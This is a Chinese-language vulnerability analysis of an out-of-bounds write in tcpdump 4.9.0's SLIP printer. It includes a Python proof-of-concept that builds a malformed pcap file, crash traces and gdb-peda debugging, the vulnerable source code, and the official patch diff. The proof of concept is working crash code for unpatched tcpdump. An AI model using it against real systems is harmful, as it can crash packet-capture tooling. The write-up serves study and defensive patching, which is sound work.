docker安装虚拟环境
docker run --privileged -i -t 32bit/ubuntu:16.04 /bin/bash #--privileged使docker有了超级权限
安装 dev 版本的 libpcap
$ sudo apt-get install libpcap-dev
$ dpkg -l libpcap-dev
Desired=Unknown/Install/Remove/Purge/Hold
| Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend
|/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad)
||/ Name Version Architecture Description
+++-===================-==============-==============-============================================
ii libpcap-dev 1.7.4-2 all development library for libpcap (transitiona
下载安装有漏洞的 tcpdump 4.9.0:
$ wget https://github.com/the-tcpdump-group/tcpdump/archive/tcpdump-4.9.0.tar.gz
$ tar zxvf tcpdump-4.9.0.tar.gz
$ cd tcpdump-tcpdump-4.9.0/
$ ./configure
执行 configure 会生成相应的 Makefile,然后 make install 就可以了,但是这里我们修改下 Makefile,给 gcc 加上参数 -fsanitize=address,以开启内存检测功能:
CFLAGS = -g -O2 -fsanitize=address
最后
$ sudo make install
$ tcpdump --version
tcpdump version 4.9.0
libpcap version 1.7.4
exp代码
import os
def sigsegv():
buf = "\xd4\xc3\xb2\xa1\x02\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00"
buf += "\x00\x00\x04\x00\x08\x00\x00\x00\xf6\xb5\xa5X\xf8\xbd\x07\x00'"
buf += "\x00\x00\x006\xe7\xe7\xe7\xe7\xe7\xe7\xe7\xe7\xe7\xe7\xe7"
buf += "\xe7\xe7\xe7\xe7\xe7\xe7\xe7\xe7\xe7\xe7\xe7\xe7\xe7\xe7\xca\x00"
buf += "\x00RT\x00\x125\x02\x08\x00'\xbd\xc8.\x08\x00"
with open("slip-bad-direction.pcap", "wb") as f:
f.write(buf)
f.close()
cmd = 'tcpdump -e -r slip-bad-direction.pcap'
os.system(cmd)
if __name__ == "__main__":
sigsegv()
运行结果
python poc.py
reading from file slip-bad-direction.pcap, link-type SLIP (SLIP)
ASAN:SIGSEGV
=================================================================
==6501==ERROR: AddressSanitizer: SEGV on unknown address 0x08425c5c (pc 0x0815f697 bp 0x00000027 sp 0xff8efa30 T0)
#0 0x815f696 in compressed_sl_print print-sl.c:253
#1 0x815f696 in sliplink_print print-sl.c:166
#2 0x815f696 in sl_if_print print-sl.c:77
#3 0x8060ecf in pretty_print_packet print.c:339
#4 0x8055328 in print_packet tcpdump.c:2501
#5 0xf7205467 (/usr/lib/i386-linux-gnu/libpcap.so.0.8+0x1c467)
#6 0xf71f60e2 in pcap_loop (/usr/lib/i386-linux-gnu/libpcap.so.0.8+0xd0e2)
#7 0x8051218 in main tcpdump.c:2004
#8 0xf704b636 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18636)
#9 0x8054315 (/usr/local/sbin/tcpdump+0x8054315)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV print-sl.c:253 compressed_sl_print
==6501==ABORTING
file
file slip-bad-direction.pcap
slip-bad-direction.pcap: tcpdump capture file (little-endian) - version 2.4 (SLIP, capture length 262144)
漏洞分析
首先介绍一下 pcap 包的文件格式,文件头是这样一个结构体,总共 24 个字节:
struct pcap_file_header {
bpf_u_int32 magic;
u_short version_major;
u_short version_minor;
bpf_int32 thiszone; /* gmt to local correction */
bpf_u_int32 sigfigs; /* accuracy of timestamps */
bpf_u_int32 snaplen; /* max length saved portion of each pkt */
bpf_u_int32 linktype; /* data link type (LINKTYPE_*) */
};
- magic:标识位:4 字节,这个标识位的值是 16 进制的 0xa1b2c3d4
- major:主版本号:2 字节,默认值为 0x2
- minor:副版本号:2 字节,默认值为 0x04
- thiszone:区域时间:4 字节,实际上并未使用,因此被设置为 0
- sigfigs:精确时间戳:4 字节,实际上并未使用,因此被设置为 0
- snaplen:数据包最大长度:4 字节,该值设置所抓获的数据包的最大长度
- linktype:链路层类型:4 字节,数据包的链路层包头决定了链路层的类型
接下来是数据包头,总共 16 个字节:
struct pcap_pkthdr {
struct timeval ts; /* time stamp */
bpf_u_int32 caplen; /* length of portion present */
bpf_u_int32 len; /* length this packet (off wire) */
};
struct timeval {
long tv_sec; /* seconds (XXX should be time_t) */
suseconds_t tv_usec; /* and microseconds */
};
- ts:时间戳:8 字节,4字节表示秒数,4字节表示微秒数
- caplen:当前数据区长度:4 字节,表示所抓获的数据包保存在 pcap 文件中的实际长度
- len:离线数据长度:4 字节,如果文件中保存的不是完整数据包,可能比 caplen 大
查看整个包结构
xxd -g1 slip-bad-direction.pcap
00000000: d4 c3 b2 a1 02 00 04 00 00 00 00 00 00 00 00 00 ................
00000010: 00 00 04 00 08 00 00 00 f6 b5 a5 58 f8 bd 07 00 ...........X....
00000020: 27 00 00 00 36 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 '...6...........
00000030: e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 ca 00 ................
00000040: 00 52 54 00 12 35 02 08 00 27 bd c8 2e 08 00 .RT..5...'.....
所以其链路层类型为 08,即 SLIP(Serial Line Internet Protocol)。通常一个 SLIP 的包结构如下:
+-------------------------+
| Direction |
| (1 Octet) |
+-------------------------+
| Packet type |
| (1 Octet) |
+-------------------------+
| Compression information |
| (14 Octets) |
+-------------------------+
| Payload |
. .
. .
. .
direction 字段指示发送或接收
- 0:表示本机接收的包
- 1:表示本机发送的包
在这里 direction 是 0xe7,并且由于 packet type 被设置了,所以 payload 是一个压缩的 TCP/IP 包,它的 packet type 和 compression information 共同构成了压缩的 TCP/IP 数据报,其结构如下:
+-------------------------------+ Byte
| | C | I | P | S | A | W | U | 0
+-------------------------------+
| connection number | 1
+-------------------------------+
| TCP checksum | 2-3
+-------------------------------+
| data | 3-16
. .
. .
. .
gdb运行
gdb ./tcpdump-tcpdump-4.9.0/tcpdump -q
r -e -r ./cves/slip-bad-direction.pcap
bt查看报错情况
gdb-peda$ bt
#0 0x0815f697 in compressed_sl_print (dir=0xe7, length=0xe7e7e726, ip=0xf65bc810, chdr=0xf65bc801 '\347' <repeats 21 times>, "\312", ndo=0xffffc410) at ./print-sl.c:253
#1 sliplink_print (length=0xe7e7e726, ip=0xf65bc810, p=0xf65bc800 '\347' <repeats 22 times>, "\312", ndo=0xffffc410) at ./print-sl.c:166
#2 sl_if_print (ndo=0xffffc410, h=0xffffc0ac, p=0xf65bc800 '\347' <repeats 22 times>, "\312") at ./print-sl.c:77
#3 0x08060ed0 in pretty_print_packet (ndo=0xffffc410, h=0xffffc0ac, sp=0xf65bc800 '\347' <repeats 22 times>, "\312", packets_captured=0x1) at ./print.c:339
#4 0x08055329 in print_packet (user=0xffffc410 "", h=0xffffc0ac, sp=0xf65bc800 '\347' <repeats 22 times>, "\312") at ./tcpdump.c:2501
#5 0xf7a4a468 in ?? () from /usr/lib/i386-linux-gnu/libpcap.so.0.8
#6 0xf7a3b0e3 in pcap_loop () from /usr/lib/i386-linux-gnu/libpcap.so.0.8
#7 0x08051219 in main (argc=0x4, argv=0xffffd7f4) at ./tcpdump.c:2004
#8 0xf7890637 in __libc_start_main (main=0x804f8f0 <main>, argc=0x4, argv=0xffffd7f4, init=0x818a160 <__libc_csu_init>, fini=0x818a1c0 <__libc_csu_fini>,
rtld_fini=0xf7fe8880 <_dl_fini>, stack_end=0xffffd7ec) at ../csu/libc-start.c:291
#9 0x08054316 in _start ()
在 sliplink_print 函数处下断点,并运行
gdb-peda$ b sliplink_print
gdb-peda$ r -e -r ./cves/slip-bad-direction.pcap
Starting program: /home/tcpdump-tcpdump-4.9.0/tcpdump -e -r ./cves/slip-bad-direction.pcap
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/i386-linux-gnu/libthread_db.so.1".
reading from file ./cves/slip-bad-direction.pcap, link-type SLIP (SLIP)
[----------------------------------registers-----------------------------------]
EAX: 0x1
EBX: 0xe7e7e736
ECX: 0x0
EDX: 0xffffc414 --> 0x1
ESI: 0xf65bc810 --> 0xe7e7e7e7
EDI: 0xffffc410 --> 0x0
EBP: 0x27 ("'")
ESP: 0xffffbfe0 --> 0xe7e7e726
EIP: 0x815efc0 (<sl_if_print+304>: mov eax,DWORD PTR [esp+0x48])
EFLAGS: 0x202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x815efbc <sl_if_print+300>: pop ebp
0x815efbd <sl_if_print+301>: ret
0x815efbe <sl_if_print+302>: xchg ax,ax
=> 0x815efc0 <sl_if_print+304>: mov eax,DWORD PTR [esp+0x48]
0x815efc4 <sl_if_print+308>: mov edx,DWORD PTR [esp+0x48]
0x815efc8 <sl_if_print+312>: shr eax,0x3
0x815efcb <sl_if_print+315>: and edx,0x7
0x815efce <sl_if_print+318>: movzx eax,BYTE PTR [eax+0x20000000]
[------------------------------------stack-------------------------------------]
0000| 0xffffbfe0 --> 0xe7e7e726
0004| 0xffffbfe4 --> 0xf65bc800 --> 0xe7e7e7e7
0008| 0xffffbfe8 --> 0x27 ("'")
0012| 0xffffbfec --> 0xfbad2488
0016| 0xffffbff0 --> 0xf5a03e68 --> 0x10
0020| 0xffffbff4 --> 0xf7fee010 (<_dl_runtime_resolve+16>: pop edx)
0024| 0xffffbff8 --> 0xf796df9b (<__fread_chk+11>: add ebx,0xbc065)
0028| 0xffffbffc --> 0xf66f4500 --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Breakpoint 1, sl_if_print (ndo=0xffffc410, h=0xffffc0ac, p=0xf65bc800 '\347' <repeats 22 times>, "\312") at ./print-sl.c:77
77 sliplink_print(ndo, p, ip, length);
gdb-peda$ x/10x 0xf65bc810
0xf65bc810: 0xe7e7e7e7 0x00cae7e7 0x00545200 0x08023512
0xf65bc820: 0xc8bd2700 0xbe00082e 0xbebebebe 0xbebebebe
0xf65bc830: 0xbebebebe 0xbebebebe
参数 p=0xf65bc810 位置处存放着从 pcap 中解析出来的 data,总共 39 个字节。
然后语句 dir = p[SLX_DIR] 从 data 中取出第一个字节作为 dir,即 0xe7:
[----------------------------------registers-----------------------------------]
EAX: 0xe7
EBX: 0xe7e7e736
ECX: 0x0
EDX: 0x0
ESI: 0xf65bc810 --> 0xe7e7e7e7
EDI: 0xffffc410 --> 0x0
EBP: 0x27 ("'")
ESP: 0xffffbfe0 --> 0xe7e7e726
EIP: 0x815efe8 (<sl_if_print+344>: mov DWORD PTR [esp+0x4],eax)
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x815efdb <sl_if_print+331>: jne 0x815f3c6 <sl_if_print+1334>
0x815efe1 <sl_if_print+337>: mov eax,DWORD PTR [esp+0x48]
0x815efe5 <sl_if_print+341>: movzx eax,BYTE PTR [eax]
=> 0x815efe8 <sl_if_print+344>: mov DWORD PTR [esp+0x4],eax
0x815efec <sl_if_print+348>: lea eax,[edi+0x74]
0x815efef <sl_if_print+351>: mov ecx,eax
0x815eff1 <sl_if_print+353>: mov DWORD PTR [esp+0x8],eax
0x815eff5 <sl_if_print+357>: shr eax,0x3
[------------------------------------stack-------------------------------------]
0000| 0xffffbfe0 --> 0xe7e7e726
0004| 0xffffbfe4 --> 0xf65bc800 --> 0xe7e7e7e7
0008| 0xffffbfe8 --> 0x27 ("'")
0012| 0xffffbfec --> 0xfbad2488
0016| 0xffffbff0 --> 0xf5a03e68 --> 0x10
0020| 0xffffbff4 --> 0xf7fee010 (<_dl_runtime_resolve+16>: pop edx)
0024| 0xffffbff8 --> 0xf796df9b (<__fread_chk+11>: add ebx,0xbc065)
0028| 0xffffbffc --> 0xf66f4500 --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x0815efe8 133 dir = p[SLX_DIR];
然后程序将 dir==0xe7 与 SLIPDIR_IN==0 作比较,肯定不相等,于是错误地把 dir 当成 SLIPDIR_OUT==1 处理了,但此时 dir 实际上是 0xe7。:
[----------------------------------registers-----------------------------------]
EAX: 0x8237280 --> 0x204f ('O ')
EBX: 0xe7e7e736
ECX: 0xe7
EDX: 0x8237280 --> 0x204f ('O ')
ESI: 0xf65bc810 --> 0xe7e7e7e7
EDI: 0xffffc410 --> 0x0
EBP: 0x27 ("'")
ESP: 0xffffbfd0 --> 0xffffc410 --> 0x0
EIP: 0x815f02b (<sl_if_print+411>: call DWORD PTR [edi+0x74])
EFLAGS: 0x296 (carry PARITY ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x815f026 <sl_if_print+406>: sub esp,0x8
0x815f029 <sl_if_print+409>: push eax
0x815f02a <sl_if_print+410>: push edi
=> 0x815f02b <sl_if_print+411>: call DWORD PTR [edi+0x74]
0x815f02e <sl_if_print+414>: lea edx,[edi+0x10]
0x815f031 <sl_if_print+417>: add esp,0x10
0x815f034 <sl_if_print+420>: mov eax,edx
0x815f036 <sl_if_print+422>: shr eax,0x3
Guessed arguments:
arg[0]: 0xffffc410 --> 0x0
arg[1]: 0x8237280 --> 0x204f ('O ')
[------------------------------------stack-------------------------------------]
0000| 0xffffbfd0 --> 0xffffc410 --> 0x0
0004| 0xffffbfd4 --> 0x8237280 --> 0x204f ('O ')
0008| 0xffffbfd8 --> 0x0
0012| 0xffffbfdc --> 0x0
0016| 0xffffbfe0 --> 0xe7e7e726
0020| 0xffffbfe4 --> 0xe7
0024| 0xffffbfe8 --> 0xffffc484 --> 0x8060b00 (<ndo_printf>: mov eax,0x8330fa4)
0028| 0xffffbfec --> 0xfbad2488
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Breakpoint 2, 0x0815f02b in sliplink_print (length=0xe7e7e726, ip=0xf65bc810, p=0xf65bc800 '\347' <repeats 22 times>, "\312", ndo=0xffffc410) at ./print-sl.c:134
134 ND_PRINT((ndo, dir == SLIPDIR_IN ? "I " : "O "));
继续往下执行,终于在执行到语句 lastlen[dir][lastconn] = length - (hlen « 2); 的时候挂掉了,它访问了一个不合法的地址:
[----------------------------------registers-----------------------------------]
EAX: 0xe7e7
EBX: 0xe7e7e6de
ECX: 0xffffc484 --> 0x8060b00 (<ndo_printf>: mov eax,0x8330fa4)
EDX: 0xe7
ESI: 0xf65bc810 --> 0xe7e7e7e7
EDI: 0xffffc410 --> 0x0
EBP: 0x27 ("'")
ESP: 0xffffbfe0 --> 0xe7e7e726
EIP: 0x815f697 (<sl_if_print+2055>: mov DWORD PTR [eax*4+0x83ebcc0],ebx)
EFLAGS: 0x10206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x815f68e <sl_if_print+2046>: mov ebx,DWORD PTR [esp+0x14]
0x815f692 <sl_if_print+2050>: shl eax,0x8
0x815f695 <sl_if_print+2053>: add eax,edx
=> 0x815f697 <sl_if_print+2055>: mov DWORD PTR [eax*4+0x83ebcc0],ebx
0x815f69e <sl_if_print+2062>: mov eax,ecx
0x815f6a0 <sl_if_print+2064>: shr eax,0x3
0x815f6a3 <sl_if_print+2067>: movzx edx,BYTE PTR [eax+0x20000000]
0x815f6aa <sl_if_print+2074>: mov eax,ecx
[------------------------------------stack-------------------------------------]
0000| 0xffffbfe0 --> 0xe7e7e726
0004| 0xffffbfe4 --> 0xe7
0008| 0xffffbfe8 --> 0xffffc484 --> 0x8060b00 (<ndo_printf>: mov eax,0x8330fa4)
0012| 0xffffbfec --> 0xf65bc801 --> 0xe7e7e7e7
0016| 0xffffbff0 --> 0xf65bc809 --> 0xe7e7e7e7
0020| 0xffffbff4 --> 0xe7e7e6de
0024| 0xffffbff8 --> 0xf796df00 (<__getwd_chk+48>: mov edx,DWORD PTR [ebx-0xd8])
0028| 0xffffbffc --> 0xf66f4500 --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x0815f697 in compressed_sl_print (dir=0xe7, length=0xe7e7e726, ip=0xf65bc810, chdr=0xf65bc801 '\347' <repeats 21 times>, "\312", ndo=0xffffc410) at ./print-sl.c:253
253 lastlen[dir][lastconn] = length - (hlen << 2);
gdb-peda$ x/wx $eax*4+0x83ebcc0
0x8425c5c: Cannot access memory at address 0x8425c5c
栈中的参数如下
0000| 0xffffbfe0 --> 0xe7e7e726 #len= 0xe7e7e726 是长度,由包头的 len 计算得到
0004| 0xffffbfe4 --> 0xe7 #是 direction
0008| 0xffffbfe8 --> 0xffffc484 --> 0x8060b00 (<ndo_printf>: mov eax,0x8330fa4)
0012| 0xffffbfec --> 0xf65bc801 --> 0xe7e7e7e7 #指向压缩的 TCP/IP 头
0016| 0xffffbff0 --> 0xf65bc809 --> 0xe7e7e7e7
0020| 0xffffbff4 --> 0xe7e7e6de
0024| 0xffffbff8 --> 0xf796df00 (<__getwd_chk+48>: mov edx,DWORD PTR [ebx-0xd8])
0028| 0xffffbffc --> 0xf66f4500 --> 0x0
完整的漏洞程序代码如下
/*
* Copyright (c) 1989, 1990, 1991, 1993, 1994, 1995, 1996, 1997
* The Regents of the University of California. All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that: (1) source code distributions
* retain the above copyright notice and this paragraph in its entirety, (2)
* distributions including binary code include the above copyright notice and
* this paragraph in its entirety in the documentation or other materials
* provided with the distribution, and (3) all advertising materials mentioning
* features or use of this software display the following acknowledgement:
* ``This product includes software developed by the University of California,
* Lawrence Berkeley Laboratory and its contributors.'' Neither the name of
* the University nor the names of its contributors may be used to endorse
* or promote products derived from this software without specific prior
* written permission.
* THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR IMPLIED
* WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED WARRANTIES OF
* MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE.
*/
/* \summary: Compressed Serial Line Internet Protocol printer */
#ifdef HAVE_CONFIG_H
#include "config.h"
#endif
#include <netdissect-stdinc.h>
#include "netdissect.h"
#include "extract.h"
#include "ip.h"
#include "tcp.h"
#include "slcompress.h"
/*
* definitions of the pseudo- link-level header attached to slip
* packets grabbed by the packet filter (bpf) traffic monitor.
*/
#define SLIP_HDRLEN 16
#define SLX_DIR 0
#define SLX_CHDR 1
#define CHDR_LEN 15
#define SLIPDIR_IN 0
#define SLIPDIR_OUT 1
static const char tstr[] = "[|slip]";
static u_int lastlen[2][256];
static u_int lastconn = 255;
static void sliplink_print(netdissect_options *, const u_char *, const struct ip *, u_int);
static void compressed_sl_print(netdissect_options *, const u_char *, const struct ip *, u_int, int);
u_int
sl_if_print(netdissect_options *ndo,
const struct pcap_pkthdr *h, const u_char *p)
{
register u_int caplen = h->caplen;
register u_int length = h->len;
register const struct ip *ip;
if (caplen < SLIP_HDRLEN || length < SLIP_HDRLEN) {
ND_PRINT((ndo, "%s", tstr));
return (caplen);
}
caplen -= SLIP_HDRLEN;
length -= SLIP_HDRLEN;
ip = (const struct ip *)(p + SLIP_HDRLEN);
if (ndo->ndo_eflag)
sliplink_print(ndo, p, ip, length);
if (caplen < 1 || length < 1) {
ND_PRINT((ndo, "%s", tstr));
return (caplen + SLIP_HDRLEN);
}
switch (IP_V(ip)) {
case 4:
ip_print(ndo, (const u_char *)ip, length);
break;
case 6:
ip6_print(ndo, (const u_char *)ip, length);
break;
default:
ND_PRINT((ndo, "ip v%d", IP_V(ip)));
}
return (SLIP_HDRLEN);
}
u_int
sl_bsdos_if_print(netdissect_options *ndo,
const struct pcap_pkthdr *h, const u_char *p)
{
register u_int caplen = h->caplen;
register u_int length = h->len;
register const struct ip *ip;
if (caplen < SLIP_HDRLEN) {
ND_PRINT((ndo, "%s", tstr));
return (caplen);
}
length -= SLIP_HDRLEN;
ip = (const struct ip *)(p + SLIP_HDRLEN);
#ifdef notdef
if (ndo->ndo_eflag)
sliplink_print(ndo, p, ip, length);
#endif
ip_print(ndo, (const u_char *)ip, length);
return (SLIP_HDRLEN);
}
static void
sliplink_print(netdissect_options *ndo,
register const u_char *p, register const struct ip *ip,
register u_int length)
{
int dir;
u_int hlen;
dir = p[SLX_DIR];
ND_PRINT((ndo, dir == SLIPDIR_IN ? "I " : "O "));
if (ndo->ndo_nflag) {
/* XXX just dump the header */
register int i;
for (i = SLX_CHDR; i < SLX_CHDR + CHDR_LEN - 1; ++i)
ND_PRINT((ndo, "%02x.", p[i]));
ND_PRINT((ndo, "%02x: ", p[SLX_CHDR + CHDR_LEN - 1]));
return;
}
switch (p[SLX_CHDR] & 0xf0) {
case TYPE_IP:
ND_PRINT((ndo, "ip %d: ", length + SLIP_HDRLEN));
break;
case TYPE_UNCOMPRESSED_TCP:
/*
* The connection id is stored in the IP protocol field.
* Get it from the link layer since sl_uncompress_tcp()
* has restored the IP header copy to IPPROTO_TCP.
*/
lastconn = ((const struct ip *)&p[SLX_CHDR])->ip_p;
hlen = IP_HL(ip);
hlen += TH_OFF((const struct tcphdr *)&((const int *)ip)[hlen]);
lastlen[dir][lastconn] = length - (hlen << 2);
ND_PRINT((ndo, "utcp %d: ", lastconn));
break;
default:
if (p[SLX_CHDR] & TYPE_COMPRESSED_TCP) {
compressed_sl_print(ndo, &p[SLX_CHDR], ip,
length, dir);
ND_PRINT((ndo, ": "));
} else
ND_PRINT((ndo, "slip-%d!: ", p[SLX_CHDR]));
}
}
static const u_char *
print_sl_change(netdissect_options *ndo,
const char *str, register const u_char *cp)
{
register u_int i;
if ((i = *cp++) == 0) {
i = EXTRACT_16BITS(cp);
cp += 2;
}
ND_PRINT((ndo, " %s%d", str, i));
return (cp);
}
static const u_char *
print_sl_winchange(netdissect_options *ndo,
register const u_char *cp)
{
register short i;
if ((i = *cp++) == 0) {
i = EXTRACT_16BITS(cp);
cp += 2;
}
if (i >= 0)
ND_PRINT((ndo, " W+%d", i));
else
ND_PRINT((ndo, " W%d", i));
return (cp);
}
static void
compressed_sl_print(netdissect_options *ndo,
const u_char *chdr, const struct ip *ip,
u_int length, int dir)
{
register const u_char *cp = chdr;
register u_int flags, hlen;
flags = *cp++;
if (flags & NEW_C) {
lastconn = *cp++;
ND_PRINT((ndo, "ctcp %d", lastconn));
} else
ND_PRINT((ndo, "ctcp *"));
/* skip tcp checksum */
cp += 2;
switch (flags & SPECIALS_MASK) {
case SPECIAL_I:
ND_PRINT((ndo, " *SA+%d", lastlen[dir][lastconn]));
break;
case SPECIAL_D:
ND_PRINT((ndo, " *S+%d", lastlen[dir][lastconn]));
break;
default:
if (flags & NEW_U)
cp = print_sl_change(ndo, "U=", cp);
if (flags & NEW_W)
cp = print_sl_winchange(ndo, cp);
if (flags & NEW_A)
cp = print_sl_change(ndo, "A+", cp);
if (flags & NEW_S)
cp = print_sl_change(ndo, "S+", cp);
break;
}
if (flags & NEW_I)
cp = print_sl_change(ndo, "I+", cp);
/*
* 'hlen' is the length of the uncompressed TCP/IP header (in words).
* 'cp - chdr' is the length of the compressed header.
* 'length - hlen' is the amount of data in the packet.
*/
hlen = IP_HL(ip);
hlen += TH_OFF((const struct tcphdr *)&((const int32_t *)ip)[hlen]);
lastlen[dir][lastconn] = length - (hlen << 2);
ND_PRINT((ndo, " %d (%ld)", lastlen[dir][lastconn], (long)(cp - chdr)));
}
漏洞修复
由上述分析,只需要保证 dir 为 0 或 1 或者其他合法值即可(后来查了一下,分别本机接受的包和本机发送的包)。
官方修复方案如下:
diff --git a/print-sl.c b/print-sl.c
index 3fd7e898..a02077b3 100644
--- a/print-sl.c
+++ b/print-sl.c
@@ -131,8 +131,21 @@ sliplink_print(netdissect_options *ndo,
u_int hlen;
dir = p[SLX_DIR];
- ND_PRINT((ndo, dir == SLIPDIR_IN ? "I " : "O "));
+ switch (dir) {
+ case SLIPDIR_IN:
+ ND_PRINT((ndo, "I "));
+ break;
+
+ case SLIPDIR_OUT:
+ ND_PRINT((ndo, "O "));
+ break;
+
+ default:
+ ND_PRINT((ndo, "Invalid direction %d ", dir));
+ dir = -1;
+ break;
+ }
......
可以看出增加了一个 switch 判断,不合法的全都把 dir 设置为了 -1。 对应的commit为:https://github.com/the-tcpdump-group/tcpdump/commit/378ac56f8055cadda55735b2a786db844d521d24